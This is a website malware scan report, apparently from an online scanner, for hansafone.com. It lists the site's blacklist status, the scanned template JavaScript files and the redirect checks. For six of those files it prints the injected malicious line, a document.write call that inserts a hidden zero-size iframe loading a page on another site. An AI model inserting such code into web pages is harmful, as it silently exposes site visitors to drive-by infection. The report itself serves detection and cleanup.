Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hansafone.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hansafone.com/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 04 Sep 2014 08:20:20 GMT Pragma: no-cache Location: http://hansafone.com/down_for_maintenance.php?sid=58gljvv2p44n6q8vd594r83105 Server: Apache Vary: Accept-Encoding Content-Length: 4 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: sid=58gljvv2p44n6q8vd594r83105; path=/; domain=.com X-Powered-By: PleskLin | clean |
http://hansafone.com/down_for_maintenance.php?sid=58gljvv2p44n6q8vd594r83105 | 200 OK Content-Length: 3119 Content-Type: text/html | clean |
http://hansafone.com/templates/playsoft_template/javascript/jquery-1.4.2.min.js | 200 OK Content-Length: 72899 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/thickbox.js | 200 OK Content-Length: 6053 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/cookie.js | 200 OK Content-Length: 4964 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/jbreadcrumb/jquery.jBreadCrumb.1.1.js | 200 OK Content-Length: 8381 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/jquery-1.2.6.min.js | 200 OK Content-Length: 56492 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/jquery.countdown.js | 200 OK Content-Length: 19028 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 8 websites. size: 0x0 src: http://www.scuolaartedanza.net/wp-admin/template.php <iframe src="http://www.scuolaartedanza.net/wp-admin/template.php" border="0" width="0" height="0"> | ||
http://www.hansafone.com/templates/playsoft_template/javascript/jquery.countdown-de.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://www.hansafone.com/test404page.js | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hansafone.com
Result:
GET / HTTP/1.1
Host: hansafone.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hansafone.com
Referer: http://www.google.com/search?q=hansafone.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hansafone.com
Referer: http://www.google.com/search?q=hansafone.com
Result:
The result is similar to the first query. There are no suspicious redirects found.